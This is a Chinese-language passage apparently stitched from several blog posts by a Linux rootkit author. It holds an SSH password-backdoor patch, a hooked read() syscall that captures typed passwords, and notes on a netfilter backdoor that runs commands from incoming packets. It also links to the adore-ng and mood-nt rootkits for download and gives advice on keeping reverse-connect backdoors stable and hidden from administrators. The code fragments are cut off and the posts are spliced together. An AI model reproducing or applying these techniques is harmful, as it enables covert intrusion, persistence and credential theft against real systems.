因为这个选项， /dev/mem类型的rootkit很可能会再次发挥作用，它默认是没开启的。。。

kernel hacking -> Filter access to /dev/mem

不过rhel系列的内核已经开启了这个选项，所以还是很安全的。 大于1m的物理内存是不能被映射的， 因此想读内核空间是不可能的。

重新升级内核到2.6.30， 没开启filter选项， 又可以读写内核空间了。。。

看下代码/drivers/char/mem.c:

/*
* This funcion reads the *physical* memory. The f_pos points directly to the
* memory location.

前几天看了rwrk这个rk的demo, 它就是利用netfilter hook住了进入主机的数据包， hook点是NF_IP_PRE_ROUTING， 因此可以在进入iptables之前提前实现数据包的过滤。在这个hook点上作文章就比较多了， 可以实现防火墙， 嗅探器， 当然也可以用来触发回连后门， wnps就是这么来作的， 因此不管主机防火墙作的规则如何变态， 都有机会穿透它。下面这个demo用来演示分析tcp包的内容， 分析出里面的命令， 然后去执行它， 有点类似以前的icmp, ip包后门， 只不过这些都在内核来完成， 功能更强大。
demo在ubuntu8.10 + 2.6.28上测试成功。

很久之前写的ssh后门patch了， 对于ssh和pam后门， 编写都比较简单， 只要在对应函数中打个patch即可。

diff -uNr old/auth-passwd.c new/auth-passwd.c
--- old/auth-passwd.c    2004-06-22 11:37:12.000000000 +0800
+++ new/auth-passwd.c    2005-10-13 15:22:27.093750000 +0800
@@ -150,6 +150,21 @@
     * Authentication is accepted if the encrypted passwords
     * are identical.
  

adore-ng老牌的linux rootkit在高版本内核编译不过去了， 简单的fix了下， 可以在高版本内核编译和运行。有需求的同学可以试试。

http://kevin1986.com/plus/wzt/adore-ng-0.56-wztfix.rar

感谢凯文提供空间

pattern.c/get_kma():
    作用：通过模式匹配搜索kmalloc()函数的地址
    如果内核没有提供LKM支持，将使我们陷入困境。而且，这个问题的解决方法非常脏，也不是很好，
    但是看来还有效。我们将遍历内核的.text段，对如下指令进行模式查询：

    push GFP_KERNEL <something between 0-0xffff>
    push size <something between 0-0x1ffff>
    call kmalloc

  

Linux后门系列--由浅入深sk13完全分析

作者 wzt
联系方式 wzt@xsec.org
个人网站 http://tthacker.cublog.cn http://xsec.org

一、简介
二、sk的特色功能
三、sk13的安装使用
四、install.c执行流程
五、install代码完全解析
六、总结
七、参考
八、WNPS简介
九、感谢


一.简介.

我们经常可以从一些搞linux入侵的朋友那里听到他们讨论sk这个rootkit，其实sk的全称是suckit，意为super user control kit。suckit这个程序可以说是目前运行于Linux 2.4内

大牛darkangel 终于把新版mood-nt发布出来了。

http://darkangel.antifork.org/
I've added a working alpha of mood-nt for kernels >= 2.6.20 (that I ported working like speedy gonzales for fun for a university challenge) in the "codes" section. A lot of work is still required in order to make it perfect however, just in case, it's there.

下载地址：
http://darkangel.antifork.org/codes/mood-nt-ctf

unix系统在输入密码的时候， 都会关闭终端回显， 利用这个特性， 就可以判断当终端属性改变的时候， 就可能是一次密码输入的过程， 当前read系统调用的buff中，　就是存放密码的内容。　代码片段如下：

asmlinkage ssize_t new_read(unsigned int fd, char __user * buf, size_t count)
{
        ssize_t ret;

        ret = (orig_read)(fd, buf, count);
        if (ret > 0

yy下， 高手请漂移。

对于every day use的linux系统来讲，回连后门要的就是稳定性， 主机可能几百天不重启。后门可能回连一段时间后， 因某些bug又不回连了， 那这后门也就没用了， 还可能被管理员发现。 所以为了提高回连的稳定性，我的做法就是设置一个定时器， 每隔一定时间就开启一个回连的线程， 记住线程开启后， 就要脱离进程， 否则线程开的太多后， 进程资源就枯竭了， 还是不能回连了。 在一个就是要设置socket的属性， 防止网络阻塞， 主机断电等特殊情况的发生。总之，一定要保证后门回连的稳定性。

我的回连后门每隔5秒就回连一次， 但是过了2个小时左右后， 客户端就监听不到连接了。 今天仔细分析了下， 原来是socket库中connect失败后， 没有close掉socket()建立的文件描述符。。。这个错误以前写mysql和ssh连接的时候都出现过， 老是不长记性， 对函数返回值做判断后， 还要继续清理一些已经存在的数据， 这样才可以保证程序的正常运行。